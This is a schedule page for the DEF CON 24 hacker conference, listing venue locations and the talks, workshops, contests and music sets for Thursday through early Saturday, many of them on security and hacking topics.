Index
Venue Maps
Locations Legends and Info
Schedule
- Thursday
- Friday
- Saturday
- Sunday
Speaker List
Talk Title List
Talk Descriptions
DEF CON News
DEF CON Entertainment
DEF CON 24 FAQ
DEF CON FAQ
Links to DEF CON 24 related pages
Venue Maps
Closeup of Bally's convention area and Indigo Tower map.
Convention area is past the elevator banks.
Indigo Tower is up the first elevator bank to the 26th floor.
Closeup of Paris convention area map.
The Paris convention area is halfway through the shops area between Bally's and Paris, in a side corridor.
Closeup of Jubilee Tower area map.
From Bally's head towards the strip, go past the registration desk and just before you walk outdoors head left. The Jubilee Tower elevators and escalators are in the far corner.
Locations Legends and Info
BHV = Bio Hacking Village
Skyview 4
CPV = Crypto Privacy Village
Bronze 1
Bronze 2
DC = DEF CON
DC 101
Track 1
Track 2
Track 3
DL = DemoLabs
Grand Salon
HHV = Hardware Hacking Village
Bally's - Contest Area
IOT = IoT Village (Internet of Things)
Bronze 4
SE = Social Engineering
Palace 2-5
ST = Skytalks
Skyview 3
WOS = Wall of Sheep / Packet Hacking Village
Skyview 6
WS = Workshops
LV BR 1 = Las Vegas Ballroom 1
LV BR 2 = Las Vegas Ballroom 2
LV BR 3 = Las Vegas Ballroom 3
LV BR 4 = Las Vegas Ballroom 4
LV BR 5 = Las Vegas Ballroom 5
LV BR 6 = Las Vegas Ballroom 6
LV BR 7 = Las Vegas Ballroom 7
WV = Wireless Village
Skyview 1
Talk/Event Schedule
Thursday
This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.
Thursday - 10:00
Return to Index - Locations Legend
DC - DC 101 - Machine Duping 101: Pwning Deep Learning Systems - Clarence Chio
WS - LV BR 1 - Operation Dark Tangent: The Def Con Messaging Protocol (DCMP) - Eijah
WS - LV BR 2 - Intro to Memory Forensics With Volatility - Miguel Antonio Guirao Aguilera
WS - LV BR 3 - Writing Your First Exploit - Rob Olson
WS - LV BR 4 - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - The In’s and Outs of Steganography - Chuck Easttom
WS - LV BR 6 - Hacking Network Protocols using Kali - Thomas Wilhelm & Todd Kendall
WS - LV BR 7 - Pentesting ICS 101 - Arnaud Soullie
Thursday - 11:00
DC - DC 101 - Maelstrom - Are You Playing with a Full Deck?... - Shane Steiger
WS - LV BR 1 - cont...(10:00-14:00) - Operation Dark Tangent: The Def Con Messaging Protocol (DCMP) - Eijah
WS - LV BR 2 - cont...(10:00-14:00) - Intro to Memory Forensics With Volatility - Miguel Antonio Guirao Aguilera
WS - LV BR 3 - cont...(10:00-14:00) - Writing Your First Exploit - Rob Olson
WS - LV BR 4 - cont...(10:00-14:00) - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - cont...(10:00-14:00) - The In’s and Outs of Steganography - Chuck Easttom
WS - LV BR 6 - cont...(10:00-14:00) - Hacking Network Protocols using Kali - Thomas Wilhelm & Todd Kendall
WS - LV BR 7 - cont...(10:00-14:00) - Pentesting ICS 101 - Arnaud Soullie
Thursday - 12:00
Bally's - 'The Office' on the 26th floor - Friends of Bill W.
DC - DC 101 - Beyond the MCSE: Red Teaming Active Directory - Sean Metcalf
WS - LV BR 1 - cont...(10:00-14:00) - Operation Dark Tangent: The Def Con Messaging Protocol (DCMP) - Eijah
WS - LV BR 2 - cont...(10:00-14:00) - Intro to Memory Forensics With Volatility - Miguel Antonio Guirao Aguilera
WS - LV BR 3 - cont...(10:00-14:00) - Writing Your First Exploit - Rob Olson
WS - LV BR 4 - cont...(10:00-14:00) - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - cont...(10:00-14:00) - The In’s and Outs of Steganography - Chuck Easttom
WS - LV BR 6 - cont...(10:00-14:00) - Hacking Network Protocols using Kali - Thomas Wilhelm & Todd Kendall
WS - LV BR 7 - cont...(10:00-14:00) - Pentesting ICS 101 - Arnaud Soullie
Thursday - 13:00
DC - DC 101 - Weaponize Your Feature Codes - Nicholas Rosario (MasterChen)
WS - LV BR 1 - cont...(10:00-14:00) - Operation Dark Tangent: The Def Con Messaging Protocol (DCMP) - Eijah
WS - LV BR 2 - cont...(10:00-14:00) - Intro to Memory Forensics With Volatility - Miguel Antonio Guirao Aguilera
WS - LV BR 3 - cont...(10:00-14:00) - Writing Your First Exploit - Rob Olson
WS - LV BR 4 - cont...(10:00-14:00) - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - cont...(10:00-14:00) - The In’s and Outs of Steganography - Chuck Easttom
WS - LV BR 6 - cont...(10:00-14:00) - Hacking Network Protocols using Kali - Thomas Wilhelm & Todd Kendall
WS - LV BR 7 - cont...(10:00-14:00) - Pentesting ICS 101 - Arnaud Soullie
Thursday - 14:00
DC - DC 101 - Realtime bluetooth device detection with Blue Hydra - Zero_Chaos & Granolocks
Thursday - 15:00
DC - DC 101 - Hacker Fundamentals and Cutting Through Abstraction - LosT
WS - LV BR 1 - C/C++ Boot Camp for Hackers - Eijah
WS - LV BR 2 - Windows Breakout and Privilege Escalation Workshop - Ruben Boonen & Francesco Mifsud
WS - LV BR 3 - Hunting Malware at Scale with osquery - Sereyvathana Ty, Nick Anderson, Javier Marcos de Prado, Teddy Reed
WS - LV BR 4 - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - Use Microsoft Free Security Tools as a Ninja - Simon Roses
WS - LV BR 6 - Intrusion Prevention System (IPS) Evasion Techniques - Thomas Wilhelm & John Spearing
WS - LV BR 7 - Open Source Malware Lab - Robert Simmons
Thursday - 16:00
DC - DC 101 - DEF CON 101 Panel - DC101
WS - LV BR 1 - cont...(15:00-19:00) - C/C++ Boot Camp for Hackers - Eijah
WS - LV BR 2 - cont...(15:00-19:00) - Windows Breakout and Privilege Escalation Workshop - Ruben Boonen & Francesco Mifsud
WS - LV BR 3 - cont...(15:00-19:00) - Hunting Malware at Scale with osquery - Sereyvathana Ty, Nick Anderson, Javier Marcos de Prado, Teddy Reed
WS - LV BR 4 - cont...(15:00-19:00) - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - cont...(15:00-19:00) - Use Microsoft Free Security Tools as a Ninja - Simon Roses
WS - LV BR 6 - cont...(15:00-19:00) - Intrusion Prevention System (IPS) Evasion Techniques - Thomas Wilhelm & John Spearing
WS - LV BR 7 - cont...(15:00-19:00) - Open Source Malware Lab - Robert Simmons
Thursday - 17:00
Bally's - 'The Office' on the 26th floor - Friends of Bill W.
Paris - Main Ballroom - Cyber Grand Challenge - The World's First All-Machine Hacking Tournament
WS - LV BR 1 - cont...(15:00-19:00) - C/C++ Boot Camp for Hackers - Eijah
WS - LV BR 2 - cont...(15:00-19:00) - Windows Breakout and Privilege Escalation Workshop - Ruben Boonen & Francesco Mifsud
WS - LV BR 3 - cont...(15:00-19:00) - Hunting Malware at Scale with osquery - Sereyvathana Ty, Nick Anderson, Javier Marcos de Prado, Teddy Reed
WS - LV BR 4 - cont...(15:00-19:00) - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - cont...(15:00-19:00) - Use Microsoft Free Security Tools as a Ninja - Simon Roses
WS - LV BR 6 - cont...(15:00-19:00) - Intrusion Prevention System (IPS) Evasion Techniques - Thomas Wilhelm & John Spearing
WS - LV BR 7 - cont...(15:00-19:00) - Open Source Malware Lab - Robert Simmons
Thursday - 18:00
Paris - Main Ballroom - cont...(17:00-19:59) - Cyber Grand Challenge - The World's First All-Machine Hacking Tournament
WS - LV BR 1 - cont...(15:00-19:00) - C/C++ Boot Camp for Hackers - Eijah
WS - LV BR 2 - cont...(15:00-19:00) - Windows Breakout and Privilege Escalation Workshop - Ruben Boonen & Francesco Mifsud
WS - LV BR 3 - cont...(15:00-19:00) - Hunting Malware at Scale with osquery - Sereyvathana Ty, Nick Anderson, Javier Marcos de Prado, Teddy Reed
WS - LV BR 4 - cont...(15:00-19:00) - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - cont...(15:00-19:00) - Use Microsoft Free Security Tools as a Ninja - Simon Roses
WS - LV BR 6 - cont...(15:00-19:00) - Intrusion Prevention System (IPS) Evasion Techniques - Thomas Wilhelm & John Spearing
WS - LV BR 7 - cont...(15:00-19:00) - Open Source Malware Lab - Robert Simmons
Thursday - 19:00
Paris - Main Ballroom - cont...(17:00-19:59) - Cyber Grand Challenge - The World's First All-Machine Hacking Tournament
Thursday - 20:00
Paris - Track 2 - Music - Collin Sullivan
Thursday - 21:00
Paris - Track 2 - Music - DJ %27
Thursday - 22:00
Paris - Track 2 - Music - ZackBarbie
Thursday - 23:00
Paris - Track 2 - Music - Alikat
Friday - 00:00
Paris - Track 2 - Music - VJ Q.Alba
Friday - 01:00
Paris - Track 2 - Music - DJ Stealth Duck
Friday
This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.
Friday - 09:00
ST - Skyview 3 - The trials & tribulations of an infosec pro in the government sector - Grecs
Friday - 10:00
BHV - Skyview 4 - WELCOME TO BHV! - Staff
BHV - Skyview 4 - Biohacking: The Moral Imperative to Build a Better You - Tim Cannon
BHV - Skyview 4 - The Patient as CEO - Robin Farmanfarmaian
BHV - Skyview 4 - Future Grind - Ryan O'Shea
BHV - Skyview 4 - Fancy Dancy Implanty - Amal Graafstra
CPV - Bronze 2 - Open House - Welcome
CPV - Bronze 2 - Tabletop Cryptography - nibb13
DC - DC 101 - BSODomizer HD: A mischievous FPGA and HDMI platform for the (m)asses - Joe Grand (Kingpin) & Zoz
DC - Track 1 - Feds and 0Days: From Before Heartbleed to After FBI-Apple - Jay Healey
DC - Track 3 - Introducing the Witchcraft Compiler Collection: Towards universal code theft - Jonathan Brossard (endrazine)
DC - Track 2 - DARPA Cyber Grand Challenge Award Ceremony - Mike Walker & Dr. Arati Prabhakar
HHV - Contest Area - Workshop-Hands on JTAG for Fun and Root Shells II - Joe FitzPatrick, Piotr Esden-Tempski
IOT - Bronze 4 - Exploiting a Smart Fridge: a Case Study in Kinetic Cyber - Kevin Cooper
ST - Skyview 3 - Automated DNS Data Exfiltration and Mitigation - Nolan Berry, Towne Besel
WS - LV BR 1 - Mobile App Attack : Taming the evil app! - Sneha Rajguru
WS - LV BR 2 - Car Hacking Workshop - Robert Leale & Nathan Hoch
WS - LV BR 3 - VoIP Wars: The Live Workshop - Fatih Ozavci
WS - LV BR 4 - Exploit Development for Beginners - Sam Bowne & Dylan James Smith
WS - LV BR 5 - Introduction to x86 disassembly - Dazzle Cat Duo
WS - LV BR 6 - Introduction to Penetration Testing with Metasploit - Georgia Weidman
WS - LV BR 7 - XSS Remediation: All the questions you were wise enough to ask, but your security team is too afraid to answer - Mike Fauzy
WOS - Skyview 6 - Opening Ceremony
Friday - 11:00
BHV - Skyview 4 - Psychoactive Chemicals in Combat - Amanda Plimpton/Evan Anderson
BHV - Skyview 4 - My dog is a hacker and will steal your data! - Rafael Fontes Souza
BHV - Skyview 4 - Biosafety for the Home Enthusiast - Mr_Br!ml3y
BHV - Skyview 4 - Implants - Amal Graafstra
CPV - Bronze 2 - Keynote: This year in Crypto & Privacy
DC - DC 101 - Meet the Feds - Jonathan Mayer & Panel
DC - Track 1 - Compelled Decryption - State of the Art in Doctrinal Perversions - Ladar Levison
DC - Track 2 - Project CITL - Mudge Zatko & Sarah Zatko
HHV - Contest Area - cont...(10:00-11:59) - Workshop-Hands on JTAG for Fun and Root Shells II - Joe FitzPatrick, Piotr Esden-Tempski
IOT - Bronze 4 - TBA - Paul Dant
ST - Skyview 3 - DNS Greylisting for Phun and Phishing Prevention - Munin
WV - Skyview 1 - Reversing LoRa: Deconstructing a Next-Gen Proprietary LPWAN - Matt Knight
WS - LV BR 1 - cont...(10:00-14:00) - Mobile App Attack : Taming the evil app! - Sneha Rajguru
WS - LV BR 2 - cont...(10:00-14:00) - Car Hacking Workshop - Robert Leale & Nathan Hoch
WS - LV BR 3 - cont...(10:00-14:00) - VoIP Wars: The Live Workshop - Fatih Ozavci
WS - LV BR 4 - cont...(10:00-14:00) - Exploit Development for Beginners - Sam Bowne & Dylan James Smith
WS - LV BR 5 - cont...(10:00-14:00) - Introduction to x86 disassembly - Dazzle Cat Duo
WS - LV BR 6 - cont...(10:00-14:00) - Introduction to Penetration Testing with Metasploit - Georgia Weidman
WS - LV BR 7 - cont...(10:00-14:00) - XSS Remediation: All the questions you were wise enough to ask, but your security team is too afraid to answer - Mike Fauzy
WOS - Skyview 6 - Music - DJ - phreakocious
WOS - Skyview 6 - Presenting Security Metrics to the Board / Leadership - Walt Williams
Friday - 12:00
Bally's - 'The Office' on the 26th floor - Friends of Bill W.
Bally's - Contest Area - DEF CON Beard and Moustache Contest
Bally's - Contest Area - "Beverage" Cooling Contraption Contest (BCCC)
BHV - Skyview 4 - The Bitcoin DNA Challenge - Keoni Gandall
BHV - Skyview 4 - Biohacking for National Security - Renee Wegzyn and Doug Weber
BHV - Skyview 4 - Flavor-Tripping: a Whole New Way to Taste! - Alan
CPV - Bronze 2 - Practical Text-Based Steganography: Exfiltrating Data from Secure Networks and Socially Engineering SecOps Analysts [WORKSHOP] - Joe Gervais (TryCatchHCF) - Principal InfoSec Engineer / Lead Pentester at Lifelock
DC - DC 101 - 411: A framework for managing security alerts - Kai Zhong
DC - Track 1 - Honey Onions: Exposing Snooping Tor HSDir Relays - Guevara Noubir & Amirali Sanatinia
DC - Track 1 - Frontrunning The Frontrunners - Dr. Paul Vixie
DC - Track 3 - Cheap Tools for Hacking Heavy Trucks - Six_Volts & Haystack
DC - Track 3 - CAN i haz car secret plz? - Javier Vazquez Vidal & Ferdinand Noelscher
DC - Track 2 - BlockFighting with a Hooker -- BlockfFghter2! - K2
HHV - Contest Area - Building malicious hardware out of analog circuits - Matthew Hicks
IOT - Bronze 4 - FCC 5G/IoT Security Policy Objectives - Rear Admiral (ret.) David Simpson, FCC, Bureau Chief
ST - Skyview 3 - Rotten to the core white box switching as the new abandonware - Brian Redbeard
WV - Skyview 1 - How Do I "BLE Hacking"? - Jose Gutierrez and Ben Ramsey
WV - Skyview 1 - Handing Full Control of the Radio Spectrum Over to the Machines - Tim O'Shea
WS - LV BR 1 - cont...(10:00-14:00) - Mobile App Attack : Taming the evil app! - Sneha Rajguru
WS - LV BR 2 - cont...(10:00-14:00) - Car Hacking Workshop - Robert Leale & Nathan Hoch
WS - LV BR 3 - cont...(10:00-14:00) - VoIP Wars: The Live Workshop - Fatih Ozavci
WS - LV BR 4 - cont...(10:00-14:00) - Exploit Development for Beginners - Sam Bowne & Dylan James Smith
WS - LV BR 5 - cont...(10:00-14:00) - Introduction to x86 disassembly - Dazzle Cat Duo
WS - LV BR 6 - cont...(10:00-14:00) - Introduction to Penetration Testing with Metasploit - Georgia Weidman
WS - LV BR 7 - cont...(10:00-14:00) - XSS Remediation: All the questions you were wise enough to ask, but your security team is too afraid to answer - Mike Fauzy
WOS - Skyview 6 - Music - DJ - AliKat
WOS - Skyview 6 - Deceive and Succeed: Measuring the Efficiency of a Deception Eco-System in Post-Breach Detection - Omer Zohar
Friday - 13:00
Bally's - Contest Area - DEF CON Beard and Moustache Contest
Bally's - Contest Area - cont...(12:00-13:30) -
BHV - Skyview 4 - Tales from a healthcare hacker - Kevin Sacco
BHV - Skyview 4 - Implants: Show and Tell - c00p3r
CPV - Bronze 2 - When Privacy Goes Poof! Why It's Gone and Never Coming Back - Richard Thieme (Neuralcowboy) - ThiemeWorks
DC - DC 101 - Sentient Storage - Do SSDs Have a Mind of Their Own? - Tom Kopchak
DC - Track 1 - Research on the Machines: Help the FTC Protect Privacy & Security - Terrell McSweeny & Lorrie Cranor
DC - Track 3 - How to Make Your Own DEF CON Black Badge - Badge Hacker Panel
DC - Track 2 - (Ab)using Smart Cities: the dark age of modern mobility - Matteo Beccaro & Matteo Collura
IOT - Bronze 1 - Sense & Avoid: Some laws to know before you break IoT - Elizabeth Wharton
ST - Skyview 3 - A Guide to Outsmarting the Machines - joseph, nephifetnf
Vendors Area - No Starch Press booth - Craig Smith, The Car Hacker's Handbook - book signing
WV - Skyview 1 - Introducing the HackMeRF - Brian Butterly and Stefan Kiese
WV - Skyview 2 - Ham Radio Exams
WS - LV BR 1 - cont...(10:00-14:00) - Mobile App Attack : Taming the evil app! - Sneha Rajguru
WS - LV BR 2 - cont...(10:00-14:00) - Car Hacking Workshop - Robert Leale & Nathan Hoch
WS - LV BR 3 - cont...(10:00-14:00) - VoIP Wars: The Live Workshop - Fatih Ozavci
WS - LV BR 4 - cont...(10:00-14:00) - Exploit Development for Beginners - Sam Bowne & Dylan James Smith
WS - LV BR 5 - cont...(10:00-14:00) - Introduction to x86 disassembly - Dazzle Cat Duo
WS - LV BR 6 - cont...(10:00-14:00) - Introduction to Penetration Testing with Metasploit - Georgia Weidman
WS - LV BR 7 - cont...(10:00-14:00) - XSS Remediation: All the questions you were wise enough to ask, but your security team is too afraid to answer - Mike Fauzy
WOS - Skyview 6 - Music - DJ - djdead
WOS - Skyview 6 - Adding Ramparts to Your Bastille: An Introduction to SELinux Hardening - Jay Beale
Friday - 14:00
BHV - Skyview 4 - Sensory Augmentation 101 - Trevor Goodman
BHV - Skyview 4 - Health as a service... - Julian Dana
CPV - Bronze 2 - Lessons from the Hacking of Ashley Madison - Per Thorsheim - Founder at PasswordsCon
DC - DC 101 - Anti-Forensics AF - int0x80
DC - Track 1 - How to design distributed systems resilient despite malicious participants - Radia Perlman
DC - Track 3 - Direct Memory Attack the Kernel - Ulf Frisk
DC - Track 2 - A Monitor Darkly: Reversing and Exploiting Ubiquitous... - Ang Cui
IOT - Bronze 4 - Picking Bluetooth Low Energy Locks from a Quarter Mile Away - Anthony Rose
ST - Skyview 3 - Financial Crime: Past, Present, and Future - Marcello Mansur
WV - Skyview 1 - Detecting and Finding Rogue Access Points - Eric Escobar and Matt Trimble
WV - Skyview 2 - cont...(13:00-17:59) - Ham Radio Exams
WS - LV BR 1 - Practical Android Application Exploitation - Dinesh Shetty & Aditya Gupta
WS - LV BR 2 - You CAN haz fun with cars! - Javier Vazquez Vidal & Ferdinand Noelscher
WS - LV BR 3 - Analyzing Internet Attacks with Honeypots - Ioannis Koniaris
WS - LV BR 5 - Nmap NSE development for offense and defense - Paulino Calderon & Tom Sellers
WS - LV BR 6 - Pragmatic Cloud Security: Hands-On Turbocharged Edition - Rich Mogull
WS - LV BR 7 - Advanced Blind SQL Injection Exploitation - David Caissy
WOS - Skyview 6 - Music - DJ - tense future
WOS - Skyview 6 - You Are Being Manipulated - GrayRaven
Friday - 15:00
BHV - Skyview 4 - Computational Chemistry on a Budget - Mr. Br!ml3y
BHV - Skyview 4 - Trigraph: An Ethereum-based Teleradiology Application - Ryan Schmoll and Peter Hefley
BHV - Skyview 4 - Rise of the Lovetron9000 - Rich Lee
CPV - Bronze 2 - Instegogram: Exploiting Instagram for C2 via Image Steganography - Amanda Rousseau, Hyrum Anderson, & Daniel Grant - R&D at Endgame
CPV - Bronze 2 - Introducing Man In The Contacts attack to trick encrypted messaging apps - Jérémy Matos - Software Security Expert at SecuringApps
DC - DC 101 - NPRE - Eavesdropping on the Machines - Tim "t0rch" Estell & Katea Murray
DC - Track 1 - How To Remote Control An Airliner: Security Flaws in Avionics - Sebastian Westerhold
DC - Track 3 - The Remote Metamorphic Engine: Detecting, Evading, Attacking the AI and Reverse Engineering - Amro Abdelgawad
DC - Track 2 - Slouching Towards Utopia: The State of the Internet Dream - Jennifer S. Granick
IOT - Bronze 1 - BtleJuice: the Bluetooth Smart Man In The Middle Framework - Damien Cauquil, Digital Security (CERT-UBIK), Senior Security Researcher
ST - Skyview 3 - Breaking Payment Points of Interaction - Nir Vailman, Patrick Watson
Vendors Area - No Starch Press booth - Georgia Weidman, Penetration Testing - book signing
WV - Skyview 1 - The Covert Cupid Under .11 Veil !!! /* Approach for Covert WIFI */ - Rushikesh D. Nandedkar and Amrita C. Iyer
WV - Skyview 2 - cont...(13:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(14:00-18:00) - Practical Android Application Exploitation - Dinesh Shetty & Aditya Gupta
WS - LV BR 2 - cont...(14:00-18:00) - You CAN haz fun with cars! - Javier Vazquez Vidal & Ferdinand Noelscher
WS - LV BR 3 - cont...(14:00-18:00) - Analyzing Internet Attacks with Honeypots - Ioannis Koniaris
WS - LV BR 5 - cont...(14:00-18:00) - Nmap NSE development for offense and defense - Paulino Calderon & Tom Sellers
WS - LV BR 6 - cont...(14:00-18:00) - Pragmatic Cloud Security: Hands-On Turbocharged Edition - Rich Mogull
WS - LV BR 7 - cont...(14:00-18:00) - Advanced Blind SQL Injection Exploitation - David Caissy
WOS - Skyview 6 - Music - DJ - TK
WOS - Skyview 6 - Connections: Eisenhower and the Internet - Chef
Friday - 16:00
BHV - Skyview 4 - Blockchain's Role in the Disruption of the Medical Industry - John Bass
BHV - Skyview 4 - Neurogenic Peptides: Smart Drugs 4-Minute Mile - Gingerbread
BHV - Skyview 4 - To Beat the Toaster, You Must Become the Toaster: How to Show AI Who's Boss in the Robot Apocalypse - Jennifer Szkatulski and Darren Lawless
CPV - Bronze 2 - Getting Started with Cryptography in Python [WORKSHOP] - Amirali Sanatinia - Northeastern University
DC - DC 101 - 101 Ways to Brick your Hardware - Joe FitzPatrick & Joe Grand
DC - Track 1 - Robot Hacks Video Games: How TASBot Exploits Consoles with Custom Controllers - Allan Cecil (dwangoAC)
DC - Track 3 - Mr. Robot Panel - Kor Adana, Dark Tangent, & Marc Rogers
DC - Track 3 - Breaking the Internet of Vibrating Things... - follower & goldfisk
DC - Track 2 - Samsung Pay: Tokenized Numbers, Flaws and Issues - Salvador Mendoza
DC - Track 2 - Side-channel attacks on high-security electronic safe locks - Plore
HHV - Contest Area - Why Ham Radio (still!) in the age of the Internet? And other projects. - Smitty of Halibut, KR6ZY
IOT - Bronze 1 - Is Your Internet Light On? Protecting Consumers in the Age of Connected Everything - Terrell McSweeny, Federal Trade Commission, Commissioner
SE - Palace 2-5 - Do cultural differences become a barrier for social engineering? - Tomohisa Ishikawa
ST - Skyview 3 - Why Snowden's Leaks Were Inevitable - Jake Williams
Vendors Area - No Starch Press booth - Michael Schrenk, Webbots, Spiders, and Screen Scrapers, 2nd Edition - book signing
WV - Skyview 1 - Kickin' It Old Skool: SDR for Ye Olde Signals - Balint Seeber
WV - Skyview 2 - cont...(13:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(14:00-18:00) - Practical Android Application Exploitation - Dinesh Shetty & Aditya Gupta
WS - LV BR 2 - cont...(14:00-18:00) - You CAN haz fun with cars! - Javier Vazquez Vidal & Ferdinand Noelscher
WS - LV BR 3 - cont...(14:00-18:00) - Analyzing Internet Attacks with Honeypots - Ioannis Koniaris
WS - LV BR 5 - cont...(14:00-18:00) - Nmap NSE development for offense and defense - Paulino Calderon & Tom Sellers
WS - LV BR 6 - cont...(14:00-18:00) - Pragmatic Cloud Security: Hands-On Turbocharged Edition - Rich Mogull
WS - LV BR 7 - cont...(14:00-18:00) - Advanced Blind SQL Injection Exploitation - David Caissy
WOS - Skyview 6 - Music - DJ - Moon in Gemini
WOS - Skyview 6 - Automated Dorking for Fun and Profit^WSalary - Filip Reesalu
Friday - 17:00
Bally's - 'The Office' on the 26th floor - Friends of Bill W.
BHV - Skyview 4 - Creating Human 2.0: Three Case Studies from the Edges of Brain Rewiring Science - David Bach
BHV - Skyview 4 - Human-Human Interface - Charles Tritt
BHV - Skyview 4 - Video Games Can Teach Science: ScienceGameCenter.org - Melanie Stegman, Ph.D.
CPV - Bronze 1 - Revocation, the Frailty of PKI - Mat Caughron (cryptofile), Trey Blalock (PrivacyGeek)
CPV - Bronze 2 - cont...(16:00-17:30) - Getting Started with Cryptography in Python [WORKSHOP] - Amirali Sanatinia - Northeastern University
CPV - Bronze 2 - privacy by design - it's n0t that difficult - Petri Koivisto
DC - DC 101 - Malware Command and Control Channels: A journey into darkness - Brad Woodberg
DC - Track 1 - Hacking Next-Gen ATM's From Capture to Cashout. - Weston Hecker
DC - Track 2 - Sk3wlDbg: Emulating all (well many) of the things with Ida - Chris Eagle
IOT - Bronze 4 - Live Drone RF Reverse Engineering - Marc Newlin, Matt Knight, Bastille Networks
SE - Palace 2-5 - The Wizard of Oz – Painting a reality through deception - David Kennedy
ST - Skyview 3 - Lie to Me - LIE TO THEM: Chronicles of "How to save $ at the Strip Club" - Steve Pordon, Buckaroo
WV - Skyview 1 - cont...(16:00-17:50) - Kickin' It Old Skool: SDR for Ye Olde Signals - Balint Seeber
WV - Skyview 2 - cont...(13:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(14:00-18:00) - Practical Android Application Exploitation - Dinesh Shetty & Aditya Gupta
WS - LV BR 2 - cont...(14:00-18:00) - You CAN haz fun with cars! - Javier Vazquez Vidal & Ferdinand Noelscher
WS - LV BR 3 - cont...(14:00-18:00) - Analyzing Internet Attacks with Honeypots - Ioannis Koniaris
WS - LV BR 5 - cont...(14:00-18:00) - Nmap NSE development for offense and defense - Paulino Calderon & Tom Sellers
WS - LV BR 6 - cont...(14:00-18:00) - Pragmatic Cloud Security: Hands-On Turbocharged Edition - Rich Mogull
WS - LV BR 7 - cont...(14:00-18:00) - Advanced Blind SQL Injection Exploitation - David Caissy
WOS - Skyview 6 - Music - DJ - %27
WOS - Skyview 6 - Verifying IPS Coverage Claims: Here's How - Garett Montgomery
Friday - 18:00
Bally's - Palace 6 - DEF CON Lawyer Meetup
BHV - Skyview 4 - tDCS workshop - Darren and Jen
BHV - Skyview 4 - BioHacking and Mortal Limitations - Dr. Stan Naydin and Vlad Gostomelsky
CPV - Bronze 1 - Security Logs Aren't Enough: Logging for User Data Protection - Alisha Kloc
CPV - Bronze 2 - State of the Curve - 2016 - Deirdre Connolly - Senior Software Engineer at Brightcove
CPV - Bronze 2 - Open House
IOT - Bronze 4 - cont...(17:00-18:50) - Live Drone RF Reverse Engineering - Marc Newlin, Matt Knight, Bastille Networks
Paris - Le Bar Du Sport - DEF CON 24 Meetup for /r/Defcon
SE - Palace 2-5 - 7 Jedi Mind Tricks: Influence Your Target With Out A Word - Chris Hadnagy
ST - Skyview 3 - Slack as Intelligence Collector or "how anime cons get weird" - Rick Glass
WV - Skyview 1 - I Amateur Radio (And So Can You!) - Kat Sweet
WOS - Skyview 6 - Music - DJ - VNA
WOS - Skyview 6 - Crawling for APIs - Ryan Mitchell
Friday - 19:00
CPV - Bronze 1 - How to backdoor Diffie-Hellman - David Wong - Security Consultant at NCC Group
SE - Palace 2-5 - US Interrogation Techniques and Social Engineering - Robert Anderson
Friday - 20:00
Bally's - Blu Pool - Queercon Pool Party - DJ Bret Law - Seattle
Bally's - Skyview 5 - Hacker Karaoke
DC - Track 1 - Hacker Jeopardy
Paris - Track 2 - Music - Skittish And Bus
SE - Palace 2-5 - You are being manipulated. - James Powell
Friday - 21:00
Bally's - Blu Pool - cont...(20:00-03:00) - Queercon Pool Party
Bally's - Skyview 5 - cont...(21:00-01:59) - Hacker Karaoke
DC - Track 1 - cont...(20:00-21:59) - Hacker Jeopardy
Paris - Napoleon's Piano Bar and Lounge - Music - Richard Cheese & Lounge Against the Machine
Paris - Track 2 - Music - Ninjula
ST - Skyview 3 - Music - 303 - DJ Slave1, DJ Ritual, Mr & Mrs. Hoodbats, Radio Scarlet, Big Daddy Doomsday
Friday - 22:00
Bally's - Blu Pool - cont...(20:00-03:00) - Queercon Pool Party - Skittish and Bus - Salt Lake City
Bally's - Skyview 5 - cont...(22:00-01:59) - Hacker Karaoke
Paris - Napoleon's Piano Bar and Lounge - Music - DJ Sm0ke Spinning
Paris - Track 2 - Music - Miss Jackalope
ST - Skyview 3 - cont...(21:00-01:59) - Music - 303 - DJ Slave1, DJ Ritual, Mr & Mrs. Hoodbats, Radio Scarlet, Big Daddy Doomsday
Friday - 23:00
Bally's - Blu Pool - cont...(20:00-03:00) - Queercon Pool Party
Bally's - Skyview 5 - cont...(23:00-01:59) - Hacker Karaoke
Paris - Napoleon's Piano Bar and Lounge - Music - Richard Cheese & Lounge Against the Machine
Paris - Track 2 - Music - Zebbler Encanti Experience
ST - Skyview 3 - cont...(21:00-01:59) - Music - 303 - DJ Slave1, DJ Ritual, Mr & Mrs. Hoodbats, Radio Scarlet, Big Daddy Doomsday
Saturday - 00:00
Bally's - Blu Pool - cont...(20:00-03:00) - Queercon Pool Party - DJ Mass Effect - San Francisco
Paris - Track 2 - Music - Dirtyphonics
ST - Skyview 3 - cont...(21:00-01:59) - Music - 303 - DJ Slave1, DJ Ritual, Mr & Mrs. Hoodbats, Radio Scarlet, Big Daddy Doomsday
Saturday - 01:00
Bally's - Blu Pool - cont...(20:00-03:00) - Queercon Pool Party
Paris - Track 2 - Music - YT Cracker
Paris - Track 2 - Music - Dualcore
ST - Skyview 3 - cont...(21:00-01:59) - Music - 303 - DJ Slave1, DJ Ritual, Mr & Mrs. Hoodbats, Radio Scarlet, Big Daddy Doomsday
Saturday - 02:00
Bally's - Blu Pool - cont...(20:00-03:00) - Queercon Pool Party
Saturday
This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.
Saturday - 09:00
ST - Skyview 3 - Saflok or Unsaflok, That is the Question - Cell Wizard
Saturday - 10:00
BHV - Skyview 4 - WELCOME TO BHV! Day 2 - Staff
BHV - Skyview 4 - Total Recall: Implanting Passwords in Cognitive Memory - Tess Schrodinger
BHV - Skyview 4 - Hacking the Second Genetic Code using Information Theory - Travis Lawrence
